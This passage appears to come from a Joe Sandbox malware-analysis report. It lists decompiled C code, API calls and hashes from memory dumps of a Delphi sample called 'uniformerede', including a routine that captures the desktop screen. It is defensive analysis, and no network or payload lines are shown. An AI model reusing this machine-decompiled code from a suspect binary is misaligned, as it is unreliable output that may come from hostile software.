                                                                                                                                                                                                                            				 *0x49b00c = 2;
                                                                                                                                                                                                                            				 *0x49e014 = 0x40124c;
                                                                                                                                                                                                                            				 *0x49e018 = 0x40125c;
                                                                                                                                                                                                                            				 *0x49e04e = 2;
                                                                                                                                                                                                                            				 *0x49e000 = E00405998;
                                                                                                                                                                                                                            				if(E00403A2C() != 0) {
                                                                                                                                                                                                                            					_t3 = E00403A5C();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403B20(_t3);
                                                                                                                                                                                                                            				 *0x49e054 = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e220 = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e3ec = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e040 = GetCommandLineA();
                                                                                                                                                                                                                            				 *0x49e03c = E004013AC();
                                                                                                                                                                                                                            				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                                                                                                                            					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                                                                                                                            						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49e5c0 = 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t11 = GetCurrentThreadId();
                                                                                                                                                                                                                            				 *0x49e034 = _t11;
                                                                                                                                                                                                                            				return _t11;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                                                              • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                            • String ID: H4c
                                                                                                                                                                                                                            • API String ID: 3734044017-3998860927
                                                                                                                                                                                                                            • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                                                                                                                                                                                            • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004047C0(void* __ecx) {
                                                                                                                                                                                                                            				long _v4;
                                                                                                                                                                                                                            				int _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49e04c == 0) {
                                                                                                                                                                                                                            					if( *0x49b034 == 0) {
                                                                                                                                                                                                                            						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
                                                                                                                                                                                                                            						 *0x49e238();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                                                                                                                            					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                            • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				intOrPtr _t96;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				struct HDC__* _t136;
                                                                                                                                                                                                                            				struct HDC__* _t137;
                                                                                                                                                                                                                            				intOrPtr* _t138;
                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t119 = __ecx;
                                                                                                                                                                                                                            				_t135 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t118 = __eax;
                                                                                                                                                                                                                            				_t46 = E00447BD0(__eax);
                                                                                                                                                                                                                            				if(_t46 != 0) {
                                                                                                                                                                                                                            					_t142 = _a4;
                                                                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                                                                                                                                                                                                            							_t138 = E00429914(1);
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                                                                                                                                                                                                            							E0042AD38(_t138, 1);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t138 + 0x40))();
                                                                                                                                                                                                                            							_t119 =  *_t138;
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t138 + 0x34))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                                                                                                                                                                                                            						E00419804( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( &_v44);
                                                                                                                                                                                                                            						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
                                                                                                                                                                                                                            						_pop(_t127);
                                                                                                                                                                                                                            						E00425980(_t57, _t127);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						_push(E00447D0C(_t118));
                                                                                                                                                                                                                            						L0042C454();
                                                                                                                                                                                                                            						E00419804(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                                                                                                                                                                                                            						_t136 = E00425C68(_t135);
                                                                                                                                                                                                                            						SetTextColor(_t136, 0xffffff);
                                                                                                                                                                                                                            						SetBkColor(_t136, 0);
                                                                                                                                                                                                                            						_push(0xe20746);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                                                                                                                                                            						_push(_a12 + 1);
                                                                                                                                                                                                                            						_t85 = _a16 + 1;
                                                                                                                                                                                                                            						__eflags = _t85;
                                                                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                                                                            						_push(_t136);
                                                                                                                                                                                                                            						L004072B8();
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                                                                                                                                                                                                            						_t137 = E00425C68(_t135);
                                                                                                                                                                                                                            						SetTextColor(_t137, 0xffffff);
                                                                                                                                                                                                                            						SetBkColor(_t137, 0);
                                                                                                                                                                                                                            						_push(0xe20746);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                                                                                                                                                            						_push(_a12);
                                                                                                                                                                                                                            						_t96 = _a16;
                                                                                                                                                                                                                            						_push(_t96);
                                                                                                                                                                                                                            						_push(_t137);
                                                                                                                                                                                                                            						L004072B8();
                                                                                                                                                                                                                            						return _t96;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_a8);
                                                                                                                                                                                                                            					_push(E00447A20(_t142));
                                                                                                                                                                                                                            					E00448008(_t118, _t142);
                                                                                                                                                                                                                            					_push(E00447A20(_t142));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_a12);
                                                                                                                                                                                                                            					_push(_a16);
                                                                                                                                                                                                                            					_push(E00425C68(__ecx));
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					_t117 = E00447D0C(_t118);
                                                                                                                                                                                                                            					_push(_t117);
                                                                                                                                                                                                                            					L0042C454();
                                                                                                                                                                                                                            					return _t117;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            0x00448201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                                                                                                                                                                                              • Part of subcall function 00448008: 73752240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73752430Color$73752240Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1345666146-0
                                                                                                                                                                                                                            • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                                                                                                                                                                                            • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043F740(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				struct tagRECT _v36;
                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				int _t61;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                            				int _t98;
                                                                                                                                                                                                                            				struct HDC__* _t99;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t99 = __edx;
                                                                                                                                                                                                                            				_t82 = __eax;
                                                                                                                                                                                                                            				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                                                                                                                                                                                            				_v16 = SaveDC(__edx);
                                                                                                                                                                                                                            				E004398B8(__edx, _a4, __ecx);
                                                                                                                                                                                                                            				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                                                                                                                                                            				_t98 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				if((GetWindowLongA(E00441704(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                                                                                                                                                                                            					_t54 = GetWindowLongA(E00441704(_t82), 0xfffffff0);
                                                                                                                                                                                                                            					__eflags = _t54 & 0x00800000;
                                                                                                                                                                                                                            					if((_t54 & 0x00800000) != 0) {
                                                                                                                                                                                                                            						_v12 = 3;
                                                                                                                                                                                                                            						_t98 = 0xa00f;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = 0xa;
                                                                                                                                                                                                                            					_t98 = 0x200f;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t98 != 0) {
                                                                                                                                                                                                                            					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                                                                                                                                                            					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                                                                                                                                                                                            					E004398B8(_t99, _v36.top, _v36.left);
                                                                                                                                                                                                                            					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0043C130(_t82, _t99, 0x14, 0);
                                                                                                                                                                                                                            				E0043C130(_t82, _t99, 0xf, 0);
                                                                                                                                                                                                                            				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                                                                                                                                                                                            				if(_t59 == 0) {
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					_t61 = RestoreDC(_t99, _v16);
                                                                                                                                                                                                                            					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                                                                                                                                                                                            					return _t61;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                                                                                                                                                                                            					if(_t63 < 0) {
                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v20 = _t63 + 1;
                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t66 = E0041AC6C( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                                                                                                                                                                                            						_t107 =  *((char*)(_t66 + 0x57));
                                                                                                                                                                                                                            						if( *((char*)(_t66 + 0x57)) != 0) {
                                                                                                                                                                                                                            							E0043F740(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                            						_t36 =  &_v20;
                                                                                                                                                                                                                            						 *_t36 = _v20 - 1;
                                                                                                                                                                                                                            					} while ( *_t36 != 0);
                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x0043f83e
                                                                                                                                                                                                                            0x0043f841
                                                                                                                                                                                                                            0x0043f844
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f847
                                                                                                                                                                                                                            0x0043f84a
                                                                                                                                                                                                                            0x0043f851
                                                                                                                                                                                                                            0x0043f85a
                                                                                                                                                                                                                            0x0043f85f
                                                                                                                                                                                                                            0x0043f863
                                                                                                                                                                                                                            0x0043f86e
                                                                                                                                                                                                                            0x0043f86e
                                                                                                                                                                                                                            0x0043f873
                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f851

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32 ref: 0043F756
                                                                                                                                                                                                                              • Part of subcall function 004398B8: GetWindowOrgEx.GDI32(?), ref: 004398C6
                                                                                                                                                                                                                              • Part of subcall function 004398B8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004398DC
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F777
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0043F78D
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0043F7AF
                                                                                                                                                                                                                            • SetRect.USER32 ref: 0043F7DB
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,?,00000000), ref: 0043F7EA
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F80F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F880
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2976466617-0
                                                                                                                                                                                                                            • Opcode ID: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                                                            • Instruction ID: 5550dfeaeb93720f68ac000546fd20648b8bffa49c9e266dbbfe82f03f6cc12f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2416671F002046BDB04EA99CC81FDE77A9AF49304F10416AF904EB396D778ED0587A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E004751FC() {
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                            				short _t34;
                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                            				short* _t51;
                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                            				short _t53;
                                                                                                                                                                                                                            				struct tagRECT* _t54;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				GetWindowRect(GetDesktopWindow(), _t54);
                                                                                                                                                                                                                            				_t39 = E00429914(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t39 + 0x40))();
                                                                                                                                                                                                                            				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t52 = _t20;
                                                                                                                                                                                                                            				_push(0x26);
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				if((_t20 & 0x00000100) == 0x100) {
                                                                                                                                                                                                                            					_t51 = E0040275C(0x404);
                                                                                                                                                                                                                            					E004032B4(_t51, 0x404);
                                                                                                                                                                                                                            					 *_t51 = 0x300;
                                                                                                                                                                                                                            					_t6 = _t51 + 4; // 0x4
                                                                                                                                                                                                                            					_t34 = _t6;
                                                                                                                                                                                                                            					_push(_t34);
                                                                                                                                                                                                                            					_push(0x100);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_t52);
                                                                                                                                                                                                                            					L004073C0();
                                                                                                                                                                                                                            					_t53 = _t34;
                                                                                                                                                                                                                            					 *((short*)(_t51 + 2)) = _t53;
                                                                                                                                                                                                                            					if(_t53 != 0) {
                                                                                                                                                                                                                            						L00407308();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040277C(_t51);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0xcc0020);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				_push(_v32 - _v40);
                                                                                                                                                                                                                            				_push(_v36 - _v44);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(E00425C68(E00429EDC(_t39)));
                                                                                                                                                                                                                            				L004072B8();
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t39;
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            0x00475287
                                                                                                                                                                                                                            0x00475289
                                                                                                                                                                                                                            0x00475290
                                                                                                                                                                                                                            0x00475293
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a8
                                                                                                                                                                                                                            0x004752ad
                                                                                                                                                                                                                            0x004752af
                                                                                                                                                                                                                            0x004752b1
                                                                                                                                                                                                                            0x004752ba
                                                                                                                                                                                                                            0x004752c3
                                                                                                                                                                                                                            0x004752c4
                                                                                                                                                                                                                            0x004752c6
                                                                                                                                                                                                                            0x004752d4
                                                                                                                                                                                                                            0x004752d5
                                                                                                                                                                                                                            0x004752da
                                                                                                                                                                                                                            0x004752db
                                                                                                                                                                                                                            0x004752dd
                                                                                                                                                                                                                            0x004752eb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00475204
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0047520A
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0047523C
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
